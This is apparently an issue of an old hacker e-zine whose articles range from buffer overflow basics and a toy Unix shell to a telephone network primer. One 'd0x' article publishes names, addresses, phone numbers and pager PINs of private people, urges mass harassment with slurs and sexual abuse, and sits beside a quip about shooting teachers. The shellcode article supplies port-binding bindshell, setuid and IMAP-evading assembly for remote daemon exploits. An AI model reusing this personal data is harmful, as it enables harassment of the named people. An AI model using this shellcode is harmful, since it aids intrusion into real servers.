the buffer begins. Buffer FP RET [XXXXXXXX][XXXX][0xF4] <--- Filled the buffer and FP with shell instruction followed by the address of where the shell instruction begins. So RET(return address) is going to execute the instruction that is assigned to 0xF4 which happens to be code that spawns a shell. Many times we have trouble finding the exact address to where the buffer begins. So we can just fuck with the address a little bit. Of course your chances wont be very good at guessing, but there is something called "Padding" that we can do. We fill about half of the buffer with something called NOP instruction. And if the return address executes an address that happens to land anywhere in the NOP instruction, the NOPS will just keep executing until they reach are shell code. For our last example, our NOP code stands for 'Y' and shell code still stands for 'X'. Lets say we dont know that the start of buffer starts at 0xF4, but were going to assume that it starts at 0xF6. Buffer FP RET [YYYYYYXX][XXXX][0xF6] <--- This would land at the second piece of our NOP instruction. And although, we dont have an exact address of where our shell code starts, are NOP instruction is going to execute all the way until it reaches our shell code. The shell code then continues being executed. Then poof!@#$ A shell is spawned. What happens if the buffer we want to overflow happens to be too small for the shell code to fit in? Well, in most cases you have access to the environment variables on the stack. With this in mind, we can stuff the shell code in a one of the variables, and overflow the buffer with the address of the variable holding our shell instruction. How might I go about auditing source code to find buffer overflow errors? Well in our example, we used the function strcpy(). But there are several functions that do not do boundary checking. strcpy(), strcat(), sprintf(), and vsprintf(). gets() is also a problem. Unlike the 4 functions above which are based on NULL for string termination, gets() reads a line from stdin into a buffer, until a newline or an EOF. Also, the while() loop does not check for character overflows. A loop that fills a buffer with per`se 'A' a specific number of times. So when auditing source, keep your eye out for these particular functions, and in many cases you will find a buffer overflow error. Good luck =) Conclusion: Hopefully after readin this, you have a better understanding as to how buffer overflows work and how they are exploited. If so you might feel comftorable with reading a more in detail and comprehensive article such as "Smashing the stack for fun and profit" by Aleph. Hope you enjoyed this article. ph1x@b4b0.org ------------------------------------------------------------------------------------------- The stupidity that lies in credit fraud, KKR ------------------------------------------------------------------------------------------- I would first like to start by stating the intent of this article. I have seen far too many of my friends busted for credit card fraud lately. Its probably one of the dumbest things you can do with your computer skills. Sure, its probably profitable to card tons of hardware and sell it off at half the price and make a bundle. Easy money right? Well, you wont be laughing when you're in jail and owe thousands of dollars to the goverment for credit card fraud. Now dont get me wrong, if you really want to get busted then go ahead, this is definatley the way to go. Its probably one of the easiest ways. There is almost a 100% chance that you will be caught and arrested, no matter what type of precautions you take. If you get caught arrested and convicted for credit fraud, the consequences can be extremely brutal. No matter what age you are, you will almost definatley be tried as an adult. If convicted, you will never be able to get any type of goverment job. This doesnt just include the FBI or other high level jobs, but you wouldnt even be able to qualify for a janitor in a public school, or a bus driver on a city bus. "Oh," you say, "Well, im really safe about carding , I use wingates and proxies, and I never order stuff to my house. Theres no way they can catch me." Wrong. The feds have complicated ways of catching carders, and trust me, its very hard not to get caught. First of all, proxy servers and the like can be unsafe. Many times they log all connections, so the federal agencies have only to call the owners of the machine, and request the logs for a certain time. A request which they will most usually comply with. Ever hear of the kids who broke into the pentagon? They used all sorts of proxies and shit, and what happened to them? They got their asses caught. Drop email addresses for reply emails from the company you're carding from can get you caught as well. Places like hotmail and yahoo usually log the host you're using to get your mail, so that's not safe either. You like bragging about your carding on IRC? Federal agents frequent irc carding channels so I'd stay away from them. You think its safe to card stuff to an empty house? Federal agents can place a small packet of material that can easily be tracked by trained dogs in the package if they are investigating you for carding, so if you bring the merchendise home, your screwed. If you're carding now, stop. If you're thinking about doing it, think again. I have a much better and more rewarding idea. Bring a shotgun to school and blast a few teachers, you have a pretty good chance of getting away with it. Kaptain Kangaroo ---------------------------------------------------------------------------------------- Screwing around with /dev/audio, by ph1x ---------------------------------------------------------------------------------------- In unix, all of your devices are reffered to as "special files". I have heard several people asking about /dev/audio, and how to access it and take advantage of it etc. I decided to write an article on it. Below are some functions that I wrote that you can use to read and write from /dev/audio. Enjoy =) -------------------------------funct10nZ------------------------------------- #include #include #include #include #include #define DEVICE "/dev/audio" /*duh*/ int fd = -1; /* this is our audio device file descriptor */ /* int open_sound(void) { while(((fd = open(DEVICE, 0_RDWR)) == -1) && (errno == EINTR)) ; if(fd <= 0) return -1; return 0; } void close_sound(void) /* this closes /dev/audio */ { close(fd); fd = -1; } /* this reads up to maxb bytes from /dev/audio */ int read_sound(char *buff, int maxb) { ssize_t bytes; while (((bytes = read(fd, buff, (size_t)max)) == -1) && (errno == EINTR)) ; return(int)bytes; } int write_sound(char *buffer, int size) { ssize_t written; // bytes written size_t tried; // bytes tried char *buffl; buffl = buffer; tried = size; while(tried != 0) { if((written = write(fd, buffl, tried)) >= 0) { tried -= written; buffl += written; } else if(errno != EINTR) break; } if(written == -1) return written; else return size; } ------------------------------------------------------------------------------- So the following function prototypes should be in like bleh.h like so.. int open_sound(void); void close_sound(void); int read_sound(char *buff, int maxb); int write_sound(char *buffer, int size); ----------------------------------------- Lets write a little proggy that reads from the microphone now. --------------------------------microphone.c------------------------------------ #include #include #include #include #include #include "bleh.h" #define BUF 1024 void main(void) { char buffer[BUF]; int read; open_sound(); printf("Speak into your microphone now, HEH!@#$\n"); while(1) { if((read = read_sound(buffer, BUF)) == -1) { fprintf(stderr, "Could not read microphone\n"); break; } else if( write_sound(buffer, read) == -1) { fprintf(stderr, "Could not write to speakers\n"); break; } } close_sound(); exit(0); } ---------------------------------------------------------------------------------------- Pretty cool huh? We had a chance to use all of my functions in this program. Unfortunatley I didnt have alot of time to extend any furthur on this article. Sorry. Enjoy =) ph1x@b4b0.org ---------------------------------------------------------------------------------------- My day in age, by rhinestone cowboy ---------------------------------------------------------------------------------------- I had an epiphany the other day. It wasn't the kind of flash of insight that makes you shave your head, move to the desert, and change your name to something that sounds like an astronomical phenomena, but I do think it's something that other people need to hear. You see, I am a professional consultant, and with this project, I became a man. I was tasked with building a firewall for a healthcare facility. This wasn't very difficult, and, apart from the planning phases and alot of mostly useless meetings, it got built in a day or two. All the exceptions were put in place, and the LAN was protected to a dgree to which it had never been protected before. All was right with the world... ... Until the client got involved. It started with a simple request. "Could you please open up telnet services in the firewall to this one particular Solaris box? We have a few outside consultants who need to get into that box so they can work remotley. In particular, we have a user from an educational facility who needs remote root access." I objected, of course, but I was then informed that it was the opinion of the IS staff, that this was an "acceptable risk." This wasn't an opinion that could be justified by anyone, especially after they shelled out countless thousands of dollars on a "network security solution". It got a little worse, of course. About a week later, I uncovered a bug in there web front end to their database. Instead of praise, I got what I should have expected, exchanges like the following: "Only people who subscribe to this database should have access. Now you are telling me that ANYONE on the net can get this data for free? What the hell is that firewall doing?" "The firewall is doing it's job. The problem is that your web app. Never asked me for anything like a password. It just gave me access. It really wasn't complicated at all. A fireall simply cannot fix your buggy software. "Firewalls make computers secure. This computer isn't secure. Obviously, the fireall you made, doesnt work." He just didn't get it. I would have been more then happy to spend the time to audit all the machines individually, apply the proper patches, and fix any configuration errors that may rear their ugly heads, if the client was willing to pay for my time. Hell, i'd even work hard! Unfortunatley, the client didn't want to hear that. He wanted his "magic bullet, " and if I wasnt willing to provide it, he'd hire another consulting company to do it. It then occurred to me, that this senario is being played out all over the net, and it's alot bigger then I had previously realized. I was playing a part, so was the IS director, so was my company, and so was the firewall. Corporate America is all about "covering your ass." No one wants accountability for anything. If bullshit and 'passing the buck' were the keys to world domination, the USA would be the world's only super power. Wait, never mind... Anyway, this is what hit me. Firewalls do alot more then filter packets and give IS gimps a warm fuzzy feeling when they go home at night. Firewalls manage to almost universally remove any traces of accountability in corporate security. As in the above example, if, I mean when, someone sniffs the root password and usese it to compromise the LAN, the IS depart- ment can pretend that they weren't at fault. They can pass the buck to me or my company. Fortunatley, there is a contract protecting us from lawsuits of that nature. If necessary, the buck can even be passed, either by my company or the clients, to the vendor. Even they can pass the buck, since any rational person would realize that they weren't involved in this morass. The myth of the "fireawall as a magic bullet" is some of the most useful bullshit ever spun. It allows everyone to sleep easier at night and make alot of money. Of course, the buck ultimately stops getting passed by another piece of bullshit, the myth of "the genius hacker." I'm not saying that there aren't some genuinely brilliant people breaking into computers these days, but chances are they aren't relying on a 5 year old sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly enough to have a guessable NIS mapname. The world is very broken. We have security products that either simply don't work, don't work up to the impossible expectations put on them , or even introduce furthur holes in hosts and networks they are suppose to be protecting. We also have a world of corperate IS managers, mostly incompetent "security consultants", and talentless bullshit artists who manage to social engineer their way into six figure incomes because they are "reformed hackers." It would be nice if some kind of messiah of the computer age were to come along and make it all better. Unfortunately, that's not going to happen. If there was such a person, we'd either nail him to a cross or he would opt for the huge paycheck which comes with playing a part in the system. I suspect I have finally entered into adult life, because I have little or no desire to change an awfuld system that I can not fix. There are quite a bit of rewards for being as corrupt as everyone else. So here is the choice facing us all, either sit down at the table of corruption and shared guilt and get paid alot (basically sell out) or fight a hopeless battle against American corporate culture. I think adulthood is really choosing to play in the "bullshit playground" with the rest of the grownups. Today, I am a man. Rhinestone Cowboy -------------------------------------------------------------------------------- d0x (For your harrasing enjoyment) by pG -------------------------------------------------------------------------------- hey kids! it's yer friendly neighborhood nazi death metal anarchist, racist, fucked up, mentally disturbed, cracked up, dopehead, abortion supportin, nigger lovin, grave desecrating, dj sporting, rave killing, teacher hating, school burning, car alarm setting, payphone breaking, road sign tagging, unethical hacking motherfucker, plastik gezus. and guess what i got for you people today...that's right people, i've got a fresh little hax0r kiddie. you all know them, and love to fuck with them. and since i seem to be like a lamer magnet since my name gets posted on every "leet-0 hax0r" site on the internet, i thought i'd share this one special kid with you. the first thing a pipe-dream hacker needs is a leet handle, as for this kid, his name is "datasyn." oh wait i'm sorry... "dAtasYn." my bad... however, that's obviously not his real name. for the sake of this article we're going to call him... oh.... Mike Feltenberger. now you may ask yourself what the point of having a el8 hax0r of your own is. well.. these people can be very fun. for example: say you're bored and you and your friends are sitting around thinking of something to do. you've got a phone. well, you could prank call him. all you would need is a number, like.. say.. 724/588-8963 or maybe 724/588-9138. now you're set! see how much fun that is? or you could shut off his phones all together, all you need is an address (like 80 Clarksville Street; Greenville, PA) and a tiny bit of skill and you're all set, my friend. now i know what you're saying: "sure this is fun for a few months, but what happens when i get bored with making his life crap?" well, then you can move on to his friends. losers always have some homosexual friends. in this case it would be a little hax0r group called the Hax0rz MatrickZ. but you say, "well i'm really lame, and i can't get d0x as elite as you pG, will you help me?" why of course, friend! the owner of this wonderfuly leet-0 hax0r gr0up is none other than the never-heard-of-before-because-has-never-done-anything nEoGoD. let's call him... say... Josh Hanselman. "but pG, what do i do with just his name?" easy, let's pretend you didn't have enough skill to get his phone number (which is 724/646-1599 btw). you could still get his address using directory services and post sex ads on yahoo.com. hours of family fun! "ok pG, but can't i make random calls to other people he knows and start talking shit about him?" why of course! now you're thinkin.. you could get the numbers of his friends too if you were el8 enough. (like say.. 724/646-0465, 724/475-2294, and 724/253-2750) see how much fun this is? "yeah it is, but what about his girlfriends?" oh that's easy, Erin.. i mean, whoever it may be, can be called and harassed just as well. like say her phone number was 724/588-0817, you could call up and say "hey Erin (or whatever her name is), you sissy cunt, are you ready for my dick bitch?" "what happens when 5000 people start calling them?" well, let's say your victim was called vyle-t0ne (724/342-2768) and he thought he was a leet hax0r, well he would quickly be put in his place and probably leave the internet in fear.well that's all for now kids. have fun. and yes, this WAS boring to write just as it was boring to read. so fuck off kid! my ass is bleeding, bye. Your friend, Plastic Gezus *************[BONUS DOX!@#$]************ Coolio: Joseph fillmore 1314 Comstock St. San Diego, CA 92111 Phone: 619-268-8330 ----------------------------------- overdose aka Shawn : 517-262-2199 1-800-800-8689, pin # 80008310 54 (alpha op dispatch) 313-238-2660 (numeric/voicemail) --------------------------------------------------------- Digitalx: (604)951-1191 ***************************************** PS. Dox dropping is lame, but for these 3 gimps, we made an special exception. -------------------------------------------------------------------------------- Coding a shell from the ground up, ph1x -------------------------------------------------------------------------------- This article I am going to discuss what a shell is, how a shell works and were going to build a shell from the ground up. For all source were going to be writing today, we will need b4b0shell.h included below. Lets get started. A shell is a program that does command interpretation. A shell can also be reffered to as a command processor, as most DOS users know. It reads input, then executes the command. The execution of a command, is basically creating a child process for the execution. For example, the shell will fork() a child process to execute the command. The parent(the shell) will then wait for its child to finish before it reads another command. Before we start coding, make sure your using the following header file in all of your codez.. /**********************************/ /* Header file for the b4b0 shell */ /* Extrapolated from ush.h, and */ /* added onto. ph1x@b4b0.org */ /**********************************/ /* NOTE: We wont be making use of this whole header file today our shell is not going to have the complexity of your standard unix shell that you use from a daily to daily */ basis. #include #include #include #include #include #include #include #include #include #define STDMODE 0600 #define DELIMITERSET " ><|&" // we are only going to add redirection to // our shell, not background or pipe support #ifndef MAX_CANON #define MAX_CANON 256 #endif #define TRUE 1 #define FALSE 0 #define BLANK_STRING " " #define PROMPT_STRING "b4b0$" #define QUIT_STRING "quit" #define BACK_STRING "&" // for background process #define PIPE_STRING "|" // pipe support #define NEWLINE_STRING "\n" #define IN_REDIRECT_SYMBOL '<' //redirection #define OUT_REDIRECT_SYMBOL '>' // symbols #define NULL_SYMBOL '\0' #define PIPE_SYMBOL '|' #define BACK_SYMBOL '&' #define NEWLINE_SYMBOL '\n' int makeargv(char *s, char *delimiters, char ***argvp); int parsefile(char *inbuf, char delimiter, char **v); // this will return // the token following delimiter if its present in *s. int redirect(char *infilename, char *outfilename); // performs redirection int connectpipeline(char *cmd, int frontfd[], int backfd[]); /*************************-=EOF=-******************************/ First we will write an extremely basic command interpreter, just for you to get a basic idea as to how a shell calls a child process to execute commands, and for you to experiment with. ---------------------------bsh v1.0----------------------------------- #include "b4b0shell.h" #define MAX_BUF 500 void main(void) { char input[MAX_BUF]; char **rargv; while(1) { fprintf(stderr, "%s\n" PROMPT_STRING); fgets(input, MAX_BUF, stdin); if(strcmp(input, QUIT_STRING) == 0) break; else { if( fork() == 0) { if(makeargv(input, BLANK_STRING, &rargv) > 0) execvp(rargv[0], rargv); } wait(NULL) } } exit(0); } --------------------------------EOF----------------------------------------- Pretty simple huh? When you run it, go ahead and execute some basic programs, like ls, grep, find etc. It works! Now, as I said before this is a very raw basic shell, and does not support wiledcards like '*' or '?'. Also, it doesnt support certain commands like 'cd' which is available in any good shell. If by some chance the wait() isnt called? Well, not too much of a problem, but if a user enters a command before the previous one is executed, the commands will execute cocurrently (read my article on cocurrency). Also, due to the fact that this first version we wrote does not find errors on the execvp() call it gets fucked up if you enter an invalid command. Your shell wont get control back from the child process and the child process creates its OWN shell. So you have to type 'quit' to get back to your parent shell. Lets write a better version of this shell, that handles errors with execvp(), and we will also replace the #define'd MAX_BUF with MAX_CANON(located in b4b0shell.h). Because MAX_BUF is nonportable. ----------------------------bsh v2.0------------------------------------- #include "b4b0shell.h" void execthecommand(char *incmd) { char **rargv; if(makeargv(incmd, BLANK_STRING, &rargv) > 0) { if(execvp(rargv[0], rargv) == -1) { printf("Invalid command\n"); exit(1); } } exit(1); } void main(void) { char input[MAX_CANON]; pid_t child_pid; while(1) { fputs(PROMPT_STRING, stdout); if (fgets(input, MAX_CANON, stdin) == NULL) break; if(*(input + strlen(input) -1) == NEWLINE_SYMBOL) *(input + strlen(input - 1) = 0; if(strcmp(input, QUIT_STRING) == 0) break; else { if ((child_pid = fork()) == 0) { execthecommand(input); exit(1); } else if(child_pid > 0) wait(NULL); } } exit(0); } ------------------------------EOF----------------------------------------- We made several changes to version 2 of our shell. Notice we used fputs() instead of fprintf() for the command line. fputs() prints a defined string alot faster. Also, notice we did some more error checking in this version. Also notice we now have the function execthecommand() to replace the original execvp() and makeargv calls. Control will never come back from the function execthecommand(), so you shouldnt be having a problem when you enter invalid commands. Unix deals with input/output through file descriptors. A program has to open a file or a device before it can access it. It will then access the file using a handle that is returned by open() syscall. With the support of re-direction, you can do stuff like this. b4b0$ cat < input.txt > output.txt That command redirects its standard input to 'input.txt' and its output to 'output.txt'. The following, is a revised version of execthecommand() function that you can use to support redirection. I basically made execthecommand() parse *incmd, which might give possible redirection. It then calls redirect() to perform the actual redirection, and makeargv() create the command array. It then execs the command. -----------------------------execthecommand() v2.0 by ph1x-------------------- #include "b4b0shell.h" void execthecommand(char *incmd) { char **rargv; char *infile; char *outfile; if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1) printf("Incorrect input redirection\n"); else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1) printf("Incorrect output redirection\n"); else if (redirect(infile, outfile) == -1) printf("redirection failed!@#$\n"); else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) { if(execvp(rargv[0], rargv) == -1) printf("Invalid command\n"); } exit(1); } --------------------------EOF--------------------------------------------- Change the execthecommand() in bsh v2.0 to the one I modified for redirection support. Lets take a look at our final shell. --------------------------bsh v3.0-------------------------------------- #include "b4b0shell.h" void execthecommand(char *incmd) { char **rargv; char *infile; char *outfile; if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1) printf("Incorrect input redirection\n"); else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1) printf("Incorrect output redirection\n"); else if (redirect(infile, outfile) == -1) printf("redirection failed!@#$\n"); else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) { if(execvp(rargv[0], rargv) == -1) printf("Invalid command\n"); } exit(1); } void main(void) { char input[MAX_CANON]; pid_t child_pid; while(1) { fputs(PROMPT_STRING, stdout); if (fgets(input, MAX_CANON, stdin) == NULL) break; if(*(input + strlen(input) -1) == NEWLINE_SYMBOL) *(input + strlen(input - 1) = 0; if(strcmp(input, QUIT_STRING) == 0) break; else { if ((child_pid = fork()) == 0) { execthecommand(input); exit(1); } else if(child_pid > 0) wait(NULL); } } exit(0); } ------------------------------EOF-------------------------------------- Redirection is the last feature we are going to put in our shell. Unfortunatley, I was busy as hell getting b4b0 7 together, and I didnt have much time to add support for pipes, background processes, jobcontrol(allows a user to move the foreground process group into the background, and vice versa), or most of the other things that a good shell features. This was merely for your learning and enjoyment. Hope you gained something out of it. Feel free to look up the functions in b4b0shell.h that we didnt use, and extend onto your shell. Bye. HEH!@#$ ph1x@b4b0.org ------------------------------------------------------------------------------------- The art of making shell code, by smiler. ------------------------------------------------------------------------------------- Hopefully you are familiar with generic shell-spawning shellcode. If not read Aleph's text "Smashing The Stack For Fun And Profit" before reading further. This article will concentrate on the types of shellcode needed to exploit daemons remotely. Generally it is much harder to exploit remote daemons, because you do not have many ways of finding out the configuration of the remote server. Often the shellcode has to be much more complicated, which is what this article will focus on. I will start by looking at the ancient IMAP4 exploit. This is a fairly simple exploit. All you need to do is "hide" the /bin/sh" string in shellcode (imapd converts all lowercase characters into uppercase). None of the instructions in the generic shell-spawning shellcode contain lower-case characters, so you all you need do is change the /bin/sh string. It is the same as normal shellcode, except there is a loop which adds 0x20 to each byte in the "/bin/sh" string. I put in lots of comments so even beginners can understand it. Sorry to all those asm virtuosos :] -----imap.S------- .globl main main: jmp call start: popl %ebx /* get address of /bin/sh */ movl %ebx,%ecx /* copy the address to ecx */ addb $0x6,%cl /* ecx now points to the last character */ loop: cmpl %ebx,%ecx jl skip /* if (ecx Most syscalls in linux x86 are done in the same way. The syscall number is put into register %eax, and the arguments are put into %ebx,%ecx and %edx respectively. In some cases, where there are more arguments than registers it may be necessary to store the arguments in user memory and store the address of the arguments in the register. Or, if an argument is a string, you would have to store the string in user memory and pass the address of string as the argument. As before, the syscall is called by "int $0x80". You can potentially use any syscall, but the ones mentioned above should just about be the only ones you will ever need. As an example heres a little shellcode snippet from my wu-ftpd exploit that should execute setuid(0). Note: you should always zero a register before using it. ---setuid.S---- .globl main main: xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */ movl %ebx,%eax /* zero out the %eax register */ movb $0x17,%al /* set the syscall number */ int $0x80 /* call the interrupt handler */ --------------- Port-Binding Shellcode When you are exploiting a daemon remotely with generic shellcode, it is necessary to have an active TCP connection to pipe the shell stdin/out/err over. This is applicable to all the remote linux exploits I've seen so far, and is the preferred method. But it is possible that a new vulnerability may be found, in a daemon that only offers a UDP service (SNMP for example). Or it may only be possible to access the daemon via UDP because the TCP ports are firewalled etc. Current linux remote vulnerabilites are exploitable via UDP - BIND as well as all rpc services run both UDP and TCP services. Also, if you send the exploit via UDP it is trivial to spoof the attacking udp packet so that you do not appear in any logs =) To exploit daemons via UDP you could write shellcode to modify the password file or to perform some other cunning task, but an interactive shell is much more elite =] Clearly it is not possible to fit a UDP pipe into shellcode, you still need a TCP connection. So my idea was to write shellcode that behaved like a very rudimentary backdoor, it binds to a port and executes a shell when it receives a connection. I know for a fact that I wasn't the first one to write this type of shellcode, but no one has officially published it so...here goes. A basic bindshell program(without the style) looks like this: int main() { char *name[2]; int fd,fd2,fromlen; struct sockaddr_in serv; fd=socket(AF_INET,SOCK_STREAM,0); serv.sin_addr.s_addr=0; serv.sin_port=1234; serv.sin_family=AF_INET; bind(fd,(struct sockaddr *)&serv,16); listen(fd,1); fromlen=16; /*(sizeof(struct sockaddr)*/ fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); /* "connect" fd2 to stdin,stdout,stderr */ dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); name[0]="/bin/sh"; name[1]=NULL; execve(name[0],name,NULL); } Obviously, this is going to require a lot more space than normal shellcode, but it can be done in under 200 bytes and most buffers are quite a bit larger than that. There is a slight complication in writing this shellcode as socket syscalls are done slightly differently than other syscalls, under linux. Every socket call has the same syscall number, 0x66. To differentiate between different socket calls, a subcode is put into the register %ebx. These can be found in . The important ones being: SYS_SOCKET 1 SYS_BIND 2 SYS_LISTEN 4 SYS_ACCEPT 5 We also need to know the values of the constants, and the exact structure of sockaddr_in. Again these are in the linux include files. AF_INET == 2 SOCK_STREAM == 1 struct sockaddr_in { short int sin_family; /* 2 byte word, containing AF_INET */ unsigned short int sin_port; /* 2 byte word, containg the port in network byte order */ struct in_addr sin_addr /* 4 byte long, should be zeroed */ unsigned char pad[8]; /* should be zero, but doesn't really matter */ }; Since there are only two registers left, the arguments must be placed sequentially in user memory, and %ecx must contain the address of the first. Hence we have to store the arguments at the end of the shellcode. The first 12 bytes will contain the 3 long arguments, the next 16 will contain the sockaddr_in structure and the final 4 will contain fromlen for the accept() call. Finally the result from each syscall is held in %eax. So, without further ado, here is the portshell warez... Again I've over-commented everything. ----portshell.S---- .globl main main: /* I had to put in a "bounce" in the middle of the code as the shellcode * was too big. If I had made it jmp the entire shellcode, the instruction * would have contained a null byte, so if anyone has a shorter version, * please send me it. */ jmp bounce start: popl %esi /* socket(2,1,0) */ xorl %eax,%eax movl %eax,0x8(%esi) /* 3rd arg == 0 */ movl %eax,0xc(%esi) /* zero out sock.sin_family&sock.sin_port */ movl %eax,0x10(%esi) /* zero out sock.sin_addr */ incb %al movl %eax,%ebx /* socket() subcode == 1 */ movl %eax,0x4(%esi) /* 2nd arg == 1 */ incb %al movl %eax,(%esi) /* 1st arg == 2 */ movw %eax,0xc(%esi) /* sock.sin_family == 2 */ leal (%esi),%ecx /* load the address of the arguments into %ecx */ movb $0x66,%al /* set socket syscall number */ int $0x80 /* bind(fd,&sock,0x10) */ incb %bl /* bind() subcode == 2 */ movb %al,(%esi) /* 1st arg == fd (result from socket()) */ movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */ addb $0xc,0x4(%esi) /* increase it by 12 bytes to point to sockaddr struct */ movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */ movb $0x23,0xe(%esi) /* set sin.port */ movb $0x66,%al /* no need to set %ecx, it is already set */ int $0x80 /* listen(fd,2) */ movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */ incb %bl /* no need to set 1st arg, it is the same as bind() */ incb %bl /* listen() subcode == 4 */ movb $0x66,%al /* again, %ecx is already set */ int $0x80 /* fd2=accept(fd,&sock,&fromlen) */ incb %bl /* accept() subcode == 5 */ movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */ addb $0xc,0x4(%esi) /* increase it by 12 bytes */ movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */ addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */ movb $0x66,%al int $0x80 /* KLUDGE */ jmp skippy bounce: jmp call skippy: /* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */ movb %al,%bl /* move fd2 to 1st arg */ xorl %ecx,%ecx /* 2nd arg is 0 */ movb $0x3f,%al /* set dup2() syscall number */ int $0x80 incb %cl /* 2nd arg is 1 */ movb $0x3f,%al int $0x80 incb %cl /* 2nd arg is 2 */ movb $0x3f,%al int $0x80 /* execve("/bin/sh",["/bin/sh"],NULL) */ movl %esi,%ebx addb $0x20,%ebx /* %ebx now points to "/bin/sh" */ xorl %eax,%eax movl %ebx,0x8(%ebx) movb %al,0x7(%ebx) movl %eax,0xc(%ebx) movb $0xb,%al leal 0x8(%ebx),%ecx leal 0xc(%ebx),%edx int $0x80 /* exit(0) */ xorl %eax,%eax movl %eax,%ebx incb %al int $0x80 call: call start .ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh" ----------------------------------------------------- Once you have sent the exploit, you only need to connect to port 8960, and you have an interactive shell. ----------------[ FreeBSD shellcode Just in case all of that was all old hat to you, I'll take a little foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most ways completely different. Primarily because syscalls are done by pushing arguments onto the stack and using a far call. The syscall number still goes in the %eax register however. OpenBSD is much the same but it uses an interrupt for syscalls. The main complication in writing shellcode for FreeBSD is in the far call (instruction lcall 7,0) which contains 5 null bytes. Obviously you would need to write some basic self-modifying shellcode. Since this is going to be used in every syscall you make, its best to put this into a mini-function and call it whenever necessary. I wrote a little template for this, it's easy enough to make it execute a shell or bind to a port. Just incase you're wondering the syscall for execve is 0x3b. ----fbsd.S---- .globl main main: jmp call start: /* Modify the ascii string so it becomes lcall 7,0 */ popl %esi xorl %ebx,%ebx movl %ebx,0x1(%esi) /* zeroed long word */ movb %bl,0x6(%esi) /* zeroed byte */ movl %esi,%ebx addb $0x8,%bl /* ebx points to binsh */ jmp blah /* start the code */ call: call start syscall: .ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */ ret binsh: .ascii "/bin/sh...." blah: /* put shellcode here */ call syscall ================================================================================ [The Telephone System/network part 1] ================================================================================ By - Pabell THE TELEPHONE SYSTEM OR NETWORK This paper was written mainly because of the lack of real information kicking around on and off the net about phone systems and networks. This is part one, of a two-part primer on phone systems. This is a very introductory paper. I don't go into great detail, but cover the basics and a first look at phone networks and systems. If you really haven't been exposed to the telephony industry, this paper, may be ominous. For the purpose of this paper I have broken the telephone network into three basic components. 1. THE CENTRAL SWITCHING MACHINE 2. THE OUTSIDE PLANT FACILITIES 3. THE INSIDE PLANT FACILITIES In this paper we will look at each of the three sections. Section three the INSIDE PLANT FACILITIES will be covered in detail throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT FACILITIES sections of the telephone network will be explained briefly in general terms. Most of the parts of the telephone system or network will already be familiar to you even without realizing it. You have a phone of some description in your home or office, which is part of the INSIDE PLANT FACILITIES section of the telephone network. The INSIDE PLANT FACILITIES consists of all the cable, hardware, telephone sets or equipment in the building or between buildings on the same piece of property. The part of the network, which connects buildings of various shapes and descriptions together, is called THE OUTSIDE PLANT FACILITIES. Poles and associated wires are the only type of outside plant distribution system in use today. The remaining part you may not know about, or at least think you don't know about, is the Central Switching Machine. The basic telephone circuit is Two Wire Circuit, which connects every telephone set, through the Outside Plant Facilities to a Central Switch. This two-wire circuit is usually referred to as a "pair". One wire of the pair is referred to as the TIP and the other wire is the RING. THE CENTRAL SWITCHING MACHINE The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all the individual two wire circuits or spokes are connected. This may sound pretty complicated, but it really isn't. The central switch monitors your telephone circuit and gives you a dial tone when you lift the telephone set off the cradle. Taking a telephone handset off the cradle is referred to as going "off-hook". Off-hook is a very common phrase, and you will hear it in later parts of this paper. When you dial, the Central Switch registers the digits dialed, and identifies the circuit of the party you are trying to reach. The Central Switch then connects your two-wire circuit to the party you dialed. The two telephone sets, which are connected together by the Central Switch, are referred to as the "calling" and "called" parties. The Central Switch the sends a ringing voltage out to the called party, which rings the set bells to identify an incoming call. When the called party goes off-hook, the Central Switch recognizes the off-hook condition, and stops sending the ringing voltage, the two parties then converse. When the calling party dials a number of a telephone circuit which is already in use, or "busy", the Central Switch recognizes the busy condition, and returns a busy tone to the calling party. So, as you can see, the Central Switch isn't really unfamiliar to you. You have interacted with, and experienced many of the operations it performs. There are many types of Central Switching Machines in use throughout the telephone industry today. Each switch has it's advantages, and features, however all systems provide the basic functions which were briefly described. To review, the main parts of the Telephone Network I have described so far are: 1. THE CENTRAL SWITCHING MACHINE 2. THE OUTSIDE PLANT FACILITIES 3. THE INSIDE PLANT FACILITIES Let's backtrack briefly to the Outside Plant Facilities section of the network. Obviously, it would be too difficult to take each seperate two-wire circuit, individually back to the Central Switch. Consequently, numerous two wire circuits or pairs from a common area are bound together in a common covering, or sheath. These groups of pairs enclosed by a common sheath are referred to as cable. The actual number of pairs in a cable or the size of cable can vary from one pair, to hundreds of pairs dependent upon how many circuits the cable must service. As was mentioned previously, all the cables servicing locations leave the Central Switch in different directions according to the route, which will be the most cost effective, and can effectively, service people in the area. The cables, which leave the Central Switch, are very large, but as the cable goes along it is continually decreasing in size, as smaller cables are dropped off at locations where they are needed. The smaller cables branch out from the main cables, and these cables again branch out to smaller cables until every building and place is reached. There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately to your phone. 1. AERIAL CABLE 2. UNDERGROUND CABLE 3. FIBER OPTIC CABLE Let's briefly look at each of the types of Outside Plant Facilities. Aerial Cable As the name aerial cable would indicate, the cable, and terminals are supported above the ground on poles. The Aerial Cable distribution system is probably the one you are most familiar with, since it was the first system utilized across North America. The poles and wire are still visible throughout this country today, and in many cases, is still the most cost-effective method, where underground cabling is physically impossible. The diagram would be typical of a single line residential building application of an Aerial Outside Plant System. You may see the term "terminal" in the diagram. 